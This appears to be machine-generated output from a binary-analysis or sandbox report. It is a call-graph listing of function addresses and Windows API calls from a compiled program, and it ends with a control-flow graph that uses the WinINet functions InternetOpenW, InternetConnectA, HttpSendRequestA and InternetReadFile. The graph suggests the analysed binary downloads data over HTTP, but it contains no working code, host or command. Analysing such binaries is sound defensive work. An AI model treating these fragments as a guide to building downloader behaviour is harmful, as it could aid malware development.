RtlAllocateHeap 14583->14587 14584 9d9180 RtlAllocateHeap 14584->14586 14585 9d9180 RtlAllocateHeap 14585->14587 14586->14581 14586->14582 14586->14584 14588 9c4938 14586->14588 14587->14583 14587->14585 14587->14586 14587->14588 14589 9d7f00 RtlAllocateHeap 14588->14589 14590 9c4993 14589->14590 14591 9d7f00 RtlAllocateHeap 14590->14591 14592 9c49ac 14591->14592 14593 9c4590 RtlAllocateHeap 14592->14593 14594 9c4a39 shared_ptr 14593->14594 14594->13949 14601 9d86d0 14602 9dd2e8 RtlAllocateHeap 14601->14602 14603 9d872a __cftof 14602->14603 14611 9d9ab0 14603->14611 14605 9d8754 14608 9d876c __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14605->14608 14615 9c42f0 14605->14615 14610 9d87df 14612 9d9ae5 14611->14612 14624 9c2be0 14612->14624 14614 9d9b16 14614->14605 14616 9dbddf InitOnceExecuteOnce 14615->14616 14617 9c430a 14616->14617 14618 9c4311 14617->14618 14619 9f6bcb 9 API calls 14617->14619 14621 9dbd50 14618->14621 14620 9c4324 14619->14620 14710 9dbc8b 14621->14710 14623 9dbd66 std::_Throw_future_error 14623->14610 14625 9c2c1d 14624->14625 14633 9dbddf 14625->14633 14627 9c2c46 14628 9c2c88 14627->14628 14629 9c2c51 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14627->14629 14636 9dbdf7 14627->14636 14645 9c2340 14628->14645 14629->14614 14648 9dcb34 14633->14648 14637 9dbe03 14636->14637 14652 9c2800 14637->14652 14639 9dbe23 std::_Throw_future_error 14640 9dbe6a 14639->14640 14641 9dbe73 14639->14641 14660 9dbd7f 14640->14660 14666 9c29e0 14641->14666 14644 9dbe6f 14644->14628 14705 9db4d6 14645->14705 14647 9c2372 14649 9dcb42 InitOnceExecuteOnce 14648->14649 14651 9dbdf2 14648->14651 14649->14651 14651->14627 14653 9d7f00 RtlAllocateHeap 14652->14653 14654 9c284f 14653->14654 14682 9c25b0 14654->14682 14656 9c288d shared_ptr 14656->14639 14657 9c2867 14657->14656 14658 9f37bc ___std_exception_copy RtlAllocateHeap 14657->14658 14659 9c28e4 14658->14659 14659->14639 14661 9dcb34 InitOnceExecuteOnce 14660->14661 14663 9dbd97 14661->14663 14662 9dbd9e 14662->14644 14663->14662 14691 9f6bcb 14663->14691 14665 9dbda7 14665->14644 14667 9dbddf InitOnceExecuteOnce 14666->14667 14669 9c29f4 __fassign 14667->14669 14668 9c29ff 14668->14644 14669->14668 14670 9f8a8f __fassign 2 API calls 14669->14670 14671 9f6c06 14670->14671 14672 9f6c15 14671->14672 14673 9f6c23 14671->14673 14674 9f6c79 9 API calls 14672->14674 14675 9f689d 3 API calls 14673->14675 14676 9f6c1f 14674->14676 14677 9f6c3d 14675->14677 14676->14644 14678 9f67fd RtlAllocateHeap 14677->14678 14679 9f6c4a 14678->14679 14680 9f6c79 9 API calls 14679->14680 14681 9f6c51 ___free_lconv_mon 14679->14681 14680->14681 14681->14644 14683 9d7840 RtlAllocateHeap 14682->14683 14684 9c2602 14683->14684 14685 9c2625 14684->14685 14686 9d8e40 RtlAllocateHeap 14684->14686 14687 9d8e40 RtlAllocateHeap 14685->14687 14689 9c268e shared_ptr 14685->14689 14686->14685 14687->14689 14688 9f37bc ___std_exception_copy RtlAllocateHeap 14690 9c274b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr ___std_exception_destroy 14688->14690 14689->14688 14689->14690 14690->14657 14692 9f6bd7 __fassign 14691->14692 14693 9f8a8f __fassign 2 API calls 14692->14693 14694 9f6c06 14693->14694 14695 9f6c15 14694->14695 14696 9f6c23 14694->14696 14697 9f6c79 9 API calls 14695->14697 14698 9f689d 3 API calls 14696->14698 14699 9f6c1f 14697->14699 14700 9f6c3d 14698->14700 14699->14665 14701 9f67fd RtlAllocateHeap 14700->14701 14702 9f6c4a 14701->14702 14703 9f6c79 9 API calls 14702->14703 14704 9f6c51 ___free_lconv_mon 14702->14704 14703->14704 14704->14665 14706 9db4f1 std::_Throw_future_error 14705->14706 14707 9f8a8f __fassign 2 API calls 14706->14707 14709 9db558 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __fassign 14706->14709 14708 9db59f 14707->14708 14709->14647 14711 9c21e0 std::invalid_argument::invalid_argument RtlAllocateHeap 14710->14711 14712 9dbc9f 14711->14712 14712->14623 14924 9da110 14925 9da190 14924->14925 14937 9d7010 14925->14937 14927 9da1cc 14930 9da230 14927->14930 14945 9d7b90 14927->14945 14957 9c3740 14930->14957 14931 9da29e shared_ptr 14932 9dd2e8 RtlAllocateHeap 14931->14932 14934 9da3be shared_ptr 14931->14934 14933 9da35e 14932->14933 14965 9c3de0 14933->14965 14936 9da3a6 14938 9d7051 14937->14938 14939 9dd2e8 RtlAllocateHeap 14938->14939 14940 9d7078 14939->14940 14941 9dd2e8 RtlAllocateHeap 14940->14941 14944 9d7286 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14940->14944 14942 9d71fb __cftof __Mtx_init_in_situ 14941->14942 14971 9c2dc0 14942->14971 14944->14927 14946 9d7c0b 14945->14946 14947 9d7ba2 14945->14947 14948 9c2380 RtlAllocateHeap 14946->14948 14949 9d7bad 14947->14949 14950 9d7bdc 14947->14950 14952 9d7bba 14948->14952 14949->14946 14953 9d7bb4 14949->14953 14951 9d7bf9 14950->14951 14954 9dd2e8 RtlAllocateHeap 14950->14954 14951->14930 14952->14930 14955 9dd2e8 RtlAllocateHeap 14953->14955 14956 9d7be6 14954->14956 14955->14952 14956->14930 14958 9c37f6 14957->14958 14962 9c375f 14957->14962 14958->14931 14959 9d90e0 RtlAllocateHeap 14960 9c3825 14959->14960 14960->14931 14961 9d7b90 RtlAllocateHeap 14961->14958 14962->14958 14963 9c37cd shared_ptr 14962->14963 14964 9c381b 14962->14964 14963->14961 14964->14959 14966 9c3e48 14965->14966 14969 9c3e1e 14965->14969 14967 9c3e58 14966->14967 15020 9c2b00 14966->15020 14967->14936 14969->14936 14972 9c2e7e GetCurrentThreadId 14971->14972 14973 9c2e06 14971->14973 14974 9c2e94 14972->14974 14975 9c2eef 14972->14975 14976 9dc5af GetSystemTimePreciseAsFileTime 14973->14976 14974->14975 14982 9dc5af GetSystemTimePreciseAsFileTime 14974->14982 14975->14944 14977 9c2e12 14976->14977 14978 9c2e1d 14977->14978 14979 9c2f1e 14977->14979 14983 9dd2e8 RtlAllocateHeap 14978->14983 14986 9c2e30 __Mtx_unlock 14978->14986 14980 9dc16d 10 API calls 14979->14980 14981 9c2f24 14980->14981 14984 9dc16d 10 API calls 14981->14984 14985 9c2eb9 14982->14985 14983->14986 14984->14985 14988 9dc16d 10 API calls 14985->14988 14989 9c2ec0 __Mtx_unlock 14985->14989 14986->14981 14987 9c2e6f 14986->14987 14987->14972 14987->14975 14988->14989 14990 9dc16d 10 API calls 14989->14990 14991 9c2ed8 __Cnd_broadcast 14989->14991 14990->14991 14991->14975 14992 9dc16d 10 API calls 14991->14992 14993 9c2f3c 14992->14993 14994 9dc5af GetSystemTimePreciseAsFileTime 14993->14994 15002 9c2f80 shared_ptr __Mtx_unlock 14994->15002 14995 9c30c5 14996 9dc16d 10 API calls 14995->14996 14997 9c30cb 14996->14997 14998 9dc16d 10 API calls 14997->14998 14999 9c30d1 14998->14999 15000 9dc16d 10 API calls 14999->15000 15008 9c3093 __Mtx_unlock 15000->15008 15001 9c30a7 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 15001->14944 15002->14995 15002->14997 15002->15001 15005 9c3032 GetCurrentThreadId 15002->15005 15003 9dc16d 10 API calls 15004 9c30dd 15003->15004 15005->15001 15006 9c303b 15005->15006 15006->15001 15007 9dc5af GetSystemTimePreciseAsFileTime 15006->15007 15009 9c305f 15007->15009 15008->15001 15008->15003 15009->14995 15009->14999 15009->15008 15011 9dbc4c 15009->15011 15014 9dba72 15011->15014 15013 9dbc5c 15013->15009 15015 9dba9c 15014->15015 15016 9dce6e _xtime_get GetSystemTimePreciseAsFileTime 15015->15016 15019 9dbaa4 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __Xtime_diff_to_millis2 15015->15019 15017 9dbacf __Xtime_diff_to_millis2 15016->15017 15018 9dce6e _xtime_get GetSystemTimePreciseAsFileTime 15017->15018 15017->15019 15018->15019 15019->15013 15021 9dd2e8 RtlAllocateHeap 15020->15021 15022 9c2b0e 15021->15022 15030 9db747 15022->15030 15024 9c2b42 15025 9c2b49 15024->15025 15036 9c2b80 15024->15036 15025->14936 15027 9c2b58 15039 9c2460 15027->15039 15029 9c2b65 std::_Throw_future_error 15031 9db754 15030->15031 15035 9db773 Concurrency::details::_Reschedule_chore 15030->15035 15042 9dca7a 15031->15042 15033 9db764 15033->15035 15044 9db71e 15033->15044 15035->15024 15050 9db6fb 15036->15050 15038 9c2bb2 shared_ptr 15038->15027 15040 9f37bc ___std_exception_copy RtlAllocateHeap 15039->15040 15041 9c2497 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 15040->15041 15041->15029 15043 9dca95 CreateThreadpoolWork 15042->15043 15043->15033 15045 9db727 Concurrency::details::_Reschedule_chore 15044->15045 15048 9dcccf 15045->15048 15047 9db741 15047->15035 15049 9dcce4 TpPostWork 15048->15049 15049->15047 15051 9db717 15050->15051 15052 9db707 15050->15052 15051->15038 15052->15051 15054 9dc97b 15052->15054 15055 9dc990 TpReleaseWork 15054->15055 15055->15051 14782 9db82e 14787 9db6b5 14782->14787 14784 9db856 14795 9db618 14784->14795 14786 9db86f 14788 9db6c1 Concurrency::details::_Reschedule_chore 14787->14788 14791 9db6f2 14788->14791 14805 9dc5af 14788->14805 14791->14784 14793 9db6dc __Mtx_unlock 14794 9c2a10 10 API calls 14793->14794 14794->14791 14796 9db624 Concurrency::details::_Reschedule_chore 14795->14796 14797 9db67e 14796->14797 14798 9dc5af GetSystemTimePreciseAsFileTime 14796->14798 14797->14786 14799 9db639 14798->14799 14800 9c2a10 10 API calls 14799->14800 14801 9db63f __Mtx_unlock 14800->14801 14802 9c2a10 10 API calls 14801->14802 14803 9db65c __Cnd_broadcast 14802->14803 14803->14797 14804 9c2a10 10 API calls 14803->14804 14804->14797 14815 9dc355 14805->14815 14807 9db6d6 14808 9c2a10 14807->14808 14809 9c2a1c 14808->14809 14810 9c2a1a 14808->14810 14832 9dc16d 14809->14832 14810->14793 14816 9dc3ab 14815->14816 14818 9dc37d __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14815->14818 14816->14818 14821 9dce6e 14816->14821 14818->14807 14819 9dc400 __Xtime_diff_to_millis2 14819->14818 14820 9dce6e _xtime_get GetSystemTimePreciseAsFileTime 14819->14820 14820->14819 14822 9dce7d 14821->14822 14824 9dce8a __aulldvrm 14821->14824 14822->14824 14825 9dce47 14822->14825 14824->14819 14828 9dcaed 14825->14828 14829 9dcafe GetSystemTimePreciseAsFileTime 14828->14829 14830 9dcb0a 14828->14830 14829->14830 14830->14824 14833 9dc195 14832->14833 14834 9dc177 14832->14834 14833->14833 14834->14833 14836 9dc19a 14834->14836 14837 9c29e0 10 API calls 14836->14837 14838 9dc1b1 14837->14838 14841 9dc102 14838->14841 14840 9dc1c2 std::_Throw_future_error 14840->14834 14842 9dc10e __EH_prolog3_GS 14841->14842 14843 9d7f00 RtlAllocateHeap 14842->14843 14844 9dc140 14843->14844 14845 9c25b0 RtlAllocateHeap 14844->14845 14846 9dc155 14845->14846 14846->14840 13080 9f6bcb 13081 9f6bd7 __fassign 13080->13081 13094 9f8a8f 13081->13094 13083 9f6c06 13084 9f6c15 13083->13084 13085 9f6c23 13083->13085 13086 9f6c79 9 API calls 13084->13086 13100 9f689d 13085->13100 13088 9f6c1f 13086->13088 13089 9f6c3d 13103 9f67fd 13089->13103 13093 9f6c51 ___free_lconv_mon 13095 9f8a94 __fassign 13094->13095 13099 9f8a9f ___std_exception_copy 13095->13099 13120 9fd4d4 13095->13120 13098 9f8ad2 __dosmaperr __fassign 13098->13083 13117 9f64fd 13099->13117 13137 9f681a 13100->13137 13102 9f68af 13102->13089 13173 9f674b 13103->13173 13105 9f6815 13105->13093 13106 9f6c79 13105->13106 13107 9f6ca4 __cftof 13106->13107 13113 9f6c87 __dosmaperr ___std_exception_copy 13106->13113 13108 9f6ce6 CreateFileW 13107->13108 13114 9f6cca __dosmaperr ___std_exception_copy 13107->13114 13109 9f6d0a 13108->13109 13110 9f6d18 13108->13110 13191 9f6de1 GetFileType 13109->13191 13203 9f6d57 13110->13203 13113->13093 13114->13093 13115 9f6d13 __cftof 13115->13114 13116 9f6d49 FindCloseChangeNotification 13115->13116 13116->13114 13125 9f63d7 13117->13125 13122 9fd4e0 __fassign 13120->13122 13121 9fd53c __dosmaperr __fassign ___std_exception_copy 13121->13099 13122->13121 13123 9f64fd __fassign 2 API calls 13122->13123 13124 9fd6ce __dosmaperr __fassign 13123->13124 13124->13099 13127 9f63e5 __fassign 13125->13127 13126 9f6430 13126->13098 13127->13126 13130 9f643b 13127->13130 13135 9fa1a2 GetPEB 13130->13135 13132 9f6445 13133 9f644a GetPEB 13132->13133 13134 9f645a __fassign 13132->13134 13133->13134 13136 9fa1bc __fassign 13135->13136 13136->13132 13138 9f683a 13137->13138 13142 9f6831 13137->13142 13138->13142 13143 9fb49b 13138->13143 13142->13102 13144 9fb4ae 13143->13144 13145 9f6870 13143->13145 13144->13145 13151 9ff44b 13144->13151 13147 9fb4c8 13145->13147 13148 9fb4db 13147->13148 13149 9fb4f0 13147->13149 13148->13149 13156 9fe551 13148->13156 13149->13142 13153 9ff457 __fassign 13151->13153 13152 9ff4a6 13152->13145 13153->13152 13154 9f8a8f __fassign 2 API calls 13153->13154 13155 9ff4cb 13154->13155 13157 9fe55b 13156->13157 13160 9fe469 13157->13160 13159 9fe561 13159->13149 13164 9fe475 __fassign ___free_lconv_mon 13160->13164 13161 9fe496 13161->13159 13162 9f8a8f __fassign 2 API calls 13163 9fe508 13162->13163 13168 9fe544 13163->13168 13169 9fa5ce 13163->13169 13164->13161 13164->13162 13168->13159 13170 9fa5f1 13169->13170 13171 9f8a8f __fassign 2 API calls 13170->13171 13172 9fa667 13171->13172 13174 9f6773 13173->13174 13179 9f6759 __dosmaperr __fassign 13173->13179 13175 9f677a 13174->13175 13177 9f6799 __fassign 13174->13177 13175->13179 13180 9f68f6 13175->13180 13178 9f68f6 RtlAllocateHeap 13177->13178 13177->13179 13178->13179 13179->13105 13181 9f6904 13180->13181 13184 9f6935 13181->13184 13187 9faeeb 13184->13187 13186 9f6915 13186->13179 13189 9faf27 __dosmaperr 13187->13189 13190 9faef9 __fassign 13187->13190 13188 9faf14 RtlAllocateHeap 13188->13189 13188->13190 13189->13186 13190->13188 13190->13189 13192 9f6e1c __cftof 13191->13192 13202 9f6eb2 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __dosmaperr 13191->13202 13193 9f6e55 GetFileInformationByHandle 13192->13193 13192->13202 13194 9f6e6b 13193->13194 13193->13202 13209 9f70a9 13194->13209 13198 9f6e88 13199 9f6f51 SystemTimeToTzSpecificLocalTime 13198->13199 13200 9f6e9b 13199->13200 13201 9f6f51 SystemTimeToTzSpecificLocalTime 13200->13201 13201->13202 13202->13115 13234 9f72f4 13203->13234 13205 9f6d65 13206 9f6d6a __dosmaperr 13205->13206 13207 9f70a9 3 API calls 13205->13207 13206->13115 13208 9f6d83 13207->13208 13208->13115 13210 9f70bf _wcsrchr 13209->13210 13213 9f6e77 13210->13213 13223 9fb9c4 13210->13223 13212 9f7103 13212->13213 13214 9fb9c4 3 API calls 13212->13214 13219 9f6f51 13213->13219 13215 9f7114 13214->13215 13215->13213 13216 9fb9c4 3 API calls 13215->13216 13217 9f7125 13216->13217 13217->13213 13218 9fb9c4 3 API calls 13217->13218 13218->13213 13220 9f6f69 13219->13220 13221 9f6f89 SystemTimeToTzSpecificLocalTime 13220->13221 13222 9f6f6f __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13220->13222 13221->13222 13222->13198 13224 9fb9d2 13223->13224 13226 9fb9d8 __dosmaperr ___std_exception_copy 13224->13226 13228 9fba0d 13224->13228 13226->13212 13227 9fba08 13227->13212 13229 9fba37 13228->13229 13232 9fba1d __dosmaperr ___std_exception_copy 13228->13232 13230 9f681a __fassign 3 API calls 13229->13230 13229->13232 13233 9fba61 13230->13233 13231 9fb985 GetPEB GetPEB RtlAllocateHeap 13231->13233 13232->13227 13233->13231 13233->13232 13235 9f7318 13234->13235 13237 9f731e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z ___std_exception_copy 13235->13237 13238 9f7016 13235->13238 13237->13205 13239 9f7022 __dosmaperr 13238->13239 13244 9fb85b 13239->13244 13241 9f703a __dosmaperr 13242 9f7048 13241->13242 13243 9fb85b RtlAllocateHeap 13241->13243 13242->13237 13243->13242 13247 9fb6be 13244->13247 13246 9fb874 13246->13241 13248 9fb6ce 13247->13248 13249 9fb73a 13247->13249 13248->13249 13250 9fb6d5 13248->13250 13264 a01ed8 13249->13264 13255 9fb6e2 ___std_exception_copy 13250->13255 13256 9fb655 13250->13256 13253 9fb71b 13260 9fb7f5 13253->13260 13255->13246 13257 9fb670 13256->13257 13259 9fb675 __dosmaperr 13257->13259 13267 9fb797 13257->13267 13259->13253 13261 9fb81b __fassign 13260->13261 13262 9fb802 13260->13262 13261->13255 13262->13261 13263 9f8a84 ___std_exception_copy RtlAllocateHeap 13262->13263 13263->13261 13278 a01d02 13264->13278 13266 a01eef 13266->13255 13268 9fb7a5 13267->13268 13271 9fb7d6 13268->13271 13274 9f8a84 13271->13274 13273 9fb7b6 13273->13259 13277 9faeeb __fassign 13274->13277 13275 9faf14 RtlAllocateHeap 13276 9faf27 __dosmaperr 13275->13276 13275->13277 13276->13273 13277->13275 13277->13276 13279 a01d34 13278->13279 13285 a01d20 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __dosmaperr ___std_exception_copy 13278->13285 13280 9fb797 RtlAllocateHeap 13279->13280 13279->13285 13281 a01dc9 13280->13281 13282 9fb655 RtlAllocateHeap 13281->13282 13283 a01dd6 13282->13283 13284 9fb7f5 RtlAllocateHeap 13283->13284 13283->13285 13284->13285 13285->13266 13299 9c73e0 13312 9d7840 13299->13312 13301 9c7415 13302 9d7840 RtlAllocateHeap 13301->13302 13303 9c7428 13302->13303 13304 9d7840 RtlAllocateHeap 13303->13304 13305 9c7438 13304->13305 13306 9d7840 RtlAllocateHeap 13305->13306 13307 9c744d 13306->13307 13308 9d7840 RtlAllocateHeap 13307->13308 13309 9c7462 13308->13309 13310 9d7840 RtlAllocateHeap 13309->13310 13311 9c7474 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13310->13311 13313 9d7866 13312->13313 13314 9d786d 13313->13314 13315 9d78c1 13313->13315 13316 9d78a2 13313->13316 13314->13301 13320 9dd2e8 RtlAllocateHeap 13315->13320 13322 9d78af __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 13315->13322 13317 9d78f9 13316->13317 13318 9d78a9 13316->13318 13331 9c2380 13317->13331 13323 9dd2e8 13318->13323 13320->13322 13322->13301 13324 9dd2ed __fassign 13323->13324 13325 9f8a84 ___std_exception_copy RtlAllocateHeap 13324->13325 13326 9dd307 13324->13326 13327 9c2380 std::_Throw_future_error 13324->13327 13325->13324 13326->13322 13330 9dd313 std::_Throw_future_error 13327->13330 13335 9f37bc 13327->13335 13329 9c23c3 13329->13322 13330->13322 13332 9c238e std::_Throw_future_error 13331->13332 13333 9f37bc ___std_exception_copy RtlAllocateHeap 13332->13333 13334 9c23c3 13333->13334 13334->13322 13336 9f37c9 13335->13336 13338 9f37e6 ___std_exception_copy 13335->13338 13336->13336 13337 9f8a84 ___std_exception_copy RtlAllocateHeap 13336->13337 13336->13338 13337->13338 13338->13329 14595 9cb0a0 14596 9cb0f2 14595->14596 14597 9d7f00 RtlAllocateHeap 14596->14597 14598 9cb133 14597->14598 14599 9d7840 RtlAllocateHeap 14598->14599 14600 9cb1dd 14599->14600 14713 9c90c0 14714 9c90f5 14713->14714 14715 9d7f00 RtlAllocateHeap 14714->14715 14716 9c9128 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14715->14716 14847 9c8a40 14848 9c8a8c 14847->14848 14849 9d7840 RtlAllocateHeap 14848->14849 14850 9c8a9c 14849->14850 14851 9c5b00 RtlAllocateHeap 14850->14851 14852 9c8aa7 14851->14852 14853 9d7f00 RtlAllocateHeap 14852->14853 14854 9c8af3 14853->14854 14855 9d7f00 RtlAllocateHeap 14854->14855 14856 9c8b45 14855->14856 14857 9d8060 RtlAllocateHeap 14856->14857 14858 9c8b57 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14857->14858 14870 9cdfa0 recv 14871 9ce002 recv 14870->14871 14872 9ce037 recv 14871->14872 14873 9ce071 14872->14873 14874 9ce193 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14873->14874 14875 9dc5af GetSystemTimePreciseAsFileTime 14873->14875 14876 9ce1ce 14875->14876 14877 9dc16d 10 API calls 14876->14877 14878 9ce238 14877->14878 14897 9ce3e0 14898 9ce3e9 14897->14898 14899 9ce406 14897->14899 14901 9ce240 14898->14901 14902 9ce250 __dosmaperr 14901->14902 14903 9f8959 3 API calls 14902->14903 14904 9ce28d 14903->14904 14905 9dc09c std::_Xinvalid_argument RtlAllocateHeap 14904->14905 14907 9ce3de 14905->14907 14906 9ce406 14906->14899 14907->14906 14908 9ce240 4 API calls 14907->14908 14908->14906 15059 9c7940 15060 9d7840 RtlAllocateHeap 15059->15060 15061 9c798b 15060->15061 15062 9c5b00 RtlAllocateHeap 15061->15062 15063 9c7993 15062->15063 15064 9d8160 RtlAllocateHeap 15063->15064 15065 9c79a3 15064->15065 15066 9d7840 RtlAllocateHeap 15065->15066 15067 9c79be 15066->15067 15068 9c5b00 RtlAllocateHeap 15067->15068 15069 9c79c5 15068->15069 15070 9d7f00 RtlAllocateHeap 15069->15070 15072 9c79e8 shared_ptr 15070->15072 15071 9c7a55 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 15072->15071 15093 9c6d20 15072->15093 15074 9d7840 RtlAllocateHeap 15076 9c7b25 15074->15076 15075 9c7acb shared_ptr 15075->15074 15092 9c7bb6 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 15075->15092 15077 9c5b00 RtlAllocateHeap 15076->15077 15078 9c7b2d 15077->15078 15079 9d7840 RtlAllocateHeap 15078->15079 15080 9c7b48 15079->15080 15081 9c5b00 RtlAllocateHeap 15080->15081 15082 9c7b50 15081->15082 15083 9d8160 RtlAllocateHeap 15082->15083 15084 9c7b61 15083->15084 15085 9d8060 RtlAllocateHeap 15084->15085 15086 9c7b71 15085->15086 15087 9d7840 RtlAllocateHeap 15086->15087 15088 9c7b8c 15087->15088 15089 9c5b00 RtlAllocateHeap 15088->15089 15090 9c7b93 15089->15090 15091 9d7f00 RtlAllocateHeap 15090->15091 15091->15092 15094 9c6d60 15093->15094 15095 9c6d7a 15094->15095 15096 9c6da5 15094->15096 15097 9d7f00 RtlAllocateHeap 15095->15097 15098 9d7f00 RtlAllocateHeap 15096->15098 15099 9c6d9b shared_ptr 15097->15099 15098->15099 15099->15075 15100 9c9140 15101 9c9194 15100->15101 15102 9d7f00 RtlAllocateHeap 15101->15102 15103 9c91dc 15102->15103 15104 9d7840 RtlAllocateHeap 15103->15104 15110 9c91f5 shared_ptr 15104->15110 15105 9c935f 15107 9d7f00 RtlAllocateHeap 15105->15107 15106 9d7840 RtlAllocateHeap 15106->15110 15111 9c93d6 shared_ptr 15107->15111 15108 9c5b00 RtlAllocateHeap 15108->15110 15109 9c9453 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 15110->15105 15110->15106 15110->15108 15110->15111 15112 9d7f00 RtlAllocateHeap 15110->15112 15111->15109 15113 9d8040 RtlAllocateHeap 15111->15113 15112->15110 15114 9c9488 15113->15114 14717 9d92e0 14718 9d92f5 14717->14718 14719 9d9333 14717->14719 14725 9dd017 14718->14725 14726 9dd028 14725->14726 14727 9d92ff 14726->14727 14736 9dd09f 14726->14736 14727->14719 14729 9dd554 14727->14729 14740 9dd527 14729->14740 14732 9dcfcd 14734 9dcfdc 14732->14734 14733 9dd085 14733->14719 14734->14733 14735 9dd081 RtlWakeAllConditionVariable 14734->14735 14735->14719 14737 9dd0ad SleepConditionVariableCS 14736->14737 14739 9dd0c6 14736->14739 14737->14739 14739->14726 14741 9dd53d 14740->14741 14742 9dd536 14740->14742 14749 9f979b 14741->14749 14746 9f972f 14742->14746 14745 9d9329 14745->14732 14747 9f979b RtlAllocateHeap 14746->14747 14748 9f9741 14747->14748 14748->14745 14752 9f94d1 14749->14752 14751 9f97cc 14751->14745 14753 9f94dd __fassign 14752->14753 14756 9f952c 14753->14756 14755 9f94f8 14755->14751 14757 9f9548 14756->14757 14758 9f95b5 __fassign ___free_lconv_mon 14756->14758 14757->14758 14761 9f9595 ___free_lconv_mon 14757->14761 14762 9fec96 14757->14762 14758->14755 14760 9fec96 RtlAllocateHeap 14760->14758 14761->14758 14761->14760 14763 9feca3 14762->14763 14765 9fecaf __cftof __dosmaperr 14763->14765 14766 a04eaf 14763->14766 14765->14761 14767 a04ebc 14766->14767 14769 a04ec4 __dosmaperr __fassign ___free_lconv_mon 14766->14769 14768 9faeeb __fassign RtlAllocateHeap 14767->14768 14768->14769 14769->14765 14770 9d7800 14771 9d7820 14770->14771 14771->14771 14772 9d7f00 RtlAllocateHeap 14771->14772 14773 9d7832 14772->14773 14774 9d8200 14775 9d75a0 RtlAllocateHeap 14774->14775 14776 9d8279 14775->14776 14777 9d8e40 RtlAllocateHeap 14776->14777 14778 9d8294 14776->14778 14777->14778 14779 9d8e40 RtlAllocateHeap 14778->14779 14781 9d82e8 14778->14781 14780 9d832e 14779->14780 14909 9d87e0 14910 9d89c7 14909->14910 14912 9d8836 14909->14912 14921 9d90e0 14910->14921 14913 9d89c2 14912->14913 14914 9d887c 14912->14914 14917 9d88a3 14912->14917 14915 9c2380 RtlAllocateHeap 14913->14915 14914->14913 14916 9d8887 14914->14916 14915->14910 14919 9dd2e8 RtlAllocateHeap 14916->14919 14918 9dd2e8 RtlAllocateHeap 14917->14918 14920 9d888d shared_ptr 14917->14920 14918->14920 14919->14920 14922 9dc0bc RtlAllocateHeap 14921->14922 14923 9d90ea 14922->14923

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1006 9cbd30-9cbd7c 1007 9cc171-9cc196 call 9d7f00 1006->1007 1008 9cbd82-9cbd86 1006->1008 1014 9cc198-9cc1a4 1007->1014 1015 9cc1c4-9cc1dc 1007->1015 1008->1007 1009 9cbd8c-9cbd90 1008->1009 1009->1007 1011 9cbd96-9cbe1f InternetOpenW InternetConnectA call 9d7840 call 9c5b00 1009->1011 1039 9cbe21 1011->1039 1040 9cbe23-9cbe3f HttpOpenRequestA 1011->1040 1017 9cc1ba-9cc1c1 call 9dd569 1014->1017 1018 9cc1a6-9cc1b4 1014->1018 1019 9cc128-9cc140 1015->1019 1020 9cc1e2-9cc1ee 1015->1020 1017->1015 1018->1017 1024 9cc23f-9cc244 call 9f6b7a 1018->1024 1021 9cc146-9cc152 1019->1021 1022 9cc213-9cc22f call 9dcef4 1019->1022 1026 9cc11e-9cc125 call 9dd569 1020->1026 1027 9cc1f4-9cc202 1020->1027 1028 9cc158-9cc166 1021->1028 1029 9cc209-9cc210 call 9dd569 1021->1029 1026->1019 1027->1024 1035 9cc204 1027->1035 1028->1024 1037 9cc16c 1028->1037 1029->1022 1035->1026 1037->1029 1039->1040 1044 9cbe70-9cbedf call 9d7840 call 9c5b00 call 9d7840 call 9c5b00 1040->1044 1045 9cbe41-9cbe50 1040->1045 1058 9cbee1 1044->1058 1059 9cbee3-9cbef9 HttpSendRequestA 1044->1059 1046 9cbe66-9cbe6d call 9dd569 1045->1046 1047 9cbe52-9cbe60 1045->1047 1046->1044 1047->1046 1058->1059 1060 9cbf2a-9cbf52 1059->1060 1061 9cbefb-9cbf0a 1059->1061 1064 9cbf54-9cbf63 1060->1064 1065 9cbf83-9cbfaa InternetReadFile 1060->1065 1062 9cbf0c-9cbf1a 1061->1062 1063 9cbf20-9cbf27 call 9dd569 1061->1063 1062->1063 1063->1060 1068 9cbf79-9cbf80 call 9dd569 1064->1068 1069 9cbf65-9cbf73 1064->1069 1071 9cbfb0-9cc058 call 9f4160 InternetReadFile 1065->1071 1068->1065 1069->1068 1080 9cc05a-9cc060 1071->1080 1080->1071
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetOpenW.WININET(00A18D18,00000000,00000000,00000000,00000000), ref: 009CBDBD
                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 009CBDE1
                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,00000000), ref: 009CBE2A
                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(?,00000000), ref: 009CBEEB
